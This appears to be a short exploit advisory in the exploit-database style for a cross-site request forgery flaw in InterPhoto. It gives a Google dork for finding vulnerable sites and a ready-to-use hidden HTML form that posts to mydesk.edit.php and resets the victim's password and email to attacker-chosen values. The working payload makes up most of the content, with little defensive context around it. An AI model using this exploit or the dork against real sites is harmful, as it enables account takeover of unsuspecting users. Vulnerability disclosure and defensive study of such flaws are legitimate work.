[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
[+]
[+] Exploit Title : InterPhoto CSRF Vulnerability
[+]
[+] Exploit Author :Und3rgr0unD security team
[+]
[+] Google Dork : inurl:interphoto?id=
[+]
[+] Vendor Homepage: http://www.interphoto.es/
[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
[+]Exploit Code:
-->
<form method="post" action="http://localhost/mydesk.edit.php">
<input type="hidden" name="action" value="updateuser" />
<input type="hidden" name="password" value="123456789" />
<input type="hidden" name="repassword" value="123456789" />
<input type="hidden" name="email" value="email@x.com" />
<input type="hidden" name="userfullname" value="" />
<input type="hidden" name="usercompany" value="" />
<input type="hidden" name="useraddress" value="" />
<input type="hidden" name="userpostcode" value="" />
<input type="hidden" name="usertel" value="" />
<input type="hidden" name="userfax" value="" />
<input type="hidden" name="useronline" value="" />
<input type="hidden" name="userwebsite" value="">
<input type="submit" value="Submit" />
</form>
<!--
[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
[+] Vulnerable Pages :
[+]
[+] [HOST]/mydesk.edit.php
[+]
[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
[+] Discovered by :bl4ck_mohajem (mohajem.war@gmail.com
[+] Special Thanks : Und3rgr0unD security team
[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
-->